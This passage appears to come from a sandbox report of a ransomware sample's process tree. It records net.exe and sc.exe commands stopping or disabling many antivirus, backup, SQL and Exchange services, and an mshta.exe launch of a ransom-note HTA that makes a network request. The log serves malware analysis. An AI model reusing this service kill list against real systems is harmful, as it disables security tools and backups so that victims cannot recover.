C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1168
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1536
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:1328
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:904
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y2⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵PID:1840
-
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y2⤵PID:1140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:1688
-
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y2⤵PID:1964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵PID:1564
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:1164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:816
-
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y2⤵PID:1248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵PID:1188
-
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵PID:828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:1824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:1596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:1376
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:844
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:1220
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:1544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:1572
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y2⤵PID:1368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵PID:1488
-
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y2⤵PID:928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵PID:1524
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y2⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:1096
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:1220
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y2⤵PID:1632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:1312
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y2⤵PID:308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:2276
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:2388
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y2⤵PID:1092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:2668
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:2300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y2⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:2404
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y2⤵PID:1140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:2216
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y2⤵PID:1260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:2140
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:1308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:2744
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵PID:1804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:2204
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:2156
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵PID:3308
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y2⤵PID:1064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:2364
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:2348
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵PID:692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2124
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y2⤵PID:816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:2080
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y2⤵PID:904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:2260
-
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:3908
-
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:1520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:3472
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:2484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:3828
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵PID:2556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:3844
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:2540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:1440
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:2524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:3900
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:2500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵PID:3940
-
-
-
C:\Windows\system32\net.exe"net.exe" stop kavfsslp /y2⤵PID:2492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:3892
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:2476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:3932
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y2⤵PID:2460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:3772
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:2452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:3788
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y2⤵PID:2436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵PID:3908
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y2⤵PID:2420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:3812
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:2412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:3948
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:2396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:3968
-
-
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:2380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:3924
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:2372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:3876
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y2⤵PID:2356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵PID:3764
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y2⤵PID:2340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵PID:3780
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:2332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:3836
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:3804
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y2⤵PID:2316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:3756
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:2308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:3916
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y2⤵PID:2292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵PID:3868
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:2268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵PID:3796
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:2252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:3884
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:2188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:3852
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:3820
-
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵PID:2164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:2440
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:2900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵PID:4020
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:2892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵PID:1740
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:2988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵PID:1692
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵PID:1544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y2⤵PID:3020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵PID:1052
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:3196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵PID:2140
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:3180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:2216
-
-
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y2⤵PID:3164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:2512
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:3140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵PID:1680
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:3132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵PID:1164
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:3124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵PID:2696
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:3116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵PID:2144
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:3108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵PID:1892
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y2⤵PID:3092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:1336
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:3076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵PID:2348
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:2260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵PID:2568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:1572
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y2⤵PID:2084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵PID:2600
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:2068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵PID:2824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:2052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵PID:2664
-
-
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y2⤵PID:3068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵PID:2688
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:3052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:4060
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:3036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵PID:4076
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y2⤵PID:3028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵PID:3000
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:3012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵PID:2712
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y2⤵PID:2972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵PID:2156
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y2⤵PID:2956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:112
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:2948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:896
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:2940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:2288
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:2924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:4092
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:2916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:4044
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:2884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:1312
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:2876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:2536
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:2868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵PID:1392
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:2860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵PID:1608
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:2852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵PID:1824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop macmnsvc /y2⤵PID:2844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵PID:4068
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:2836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:2124
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:2828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:2552
-
-
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y2⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:2392
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:2796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:4084
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:2788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:2592
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:2772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:4028
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:2764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:2576
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:2756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵PID:4036
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:2148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:1300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:2116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:3976
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:3748
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:2668
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y2⤵PID:2088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵PID:3336
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:3248
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBAMService /y2⤵PID:3204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:2232
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y2⤵PID:3576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:3192
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:3984
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:4052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:1952
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:1600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵PID:2976
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:2360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵PID:2592
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:2620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵PID:2368
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:2376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵PID:1608
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:3508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵PID:2352
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:2488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵PID:3656
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:3892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:3628
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:3880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵PID:3008
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y2⤵PID:2284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:3648
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:2724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵PID:1892
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SepMasterService /y2⤵PID:3924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:3712
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:3928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵PID:1572
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVService /y2⤵PID:2548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵PID:2300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:3844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵PID:1628
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVAdminService /y2⤵PID:3848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵PID:2880
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:3852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵PID:3356
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sacsvr /y2⤵PID:2508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵PID:2568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:3840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:2600
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:3408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵PID:3696
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:2644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵PID:2864
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:3856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵PID:3676
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfevtp /y2⤵PID:3492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:2512
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RESvc /y2⤵PID:2328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵PID:3344
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵PID:2628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:1680
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfemms /y2⤵PID:3460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:2264
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:2456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:3636
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵PID:3800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:2648
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfefire /y2⤵PID:2612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵PID:2720
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:3864
-
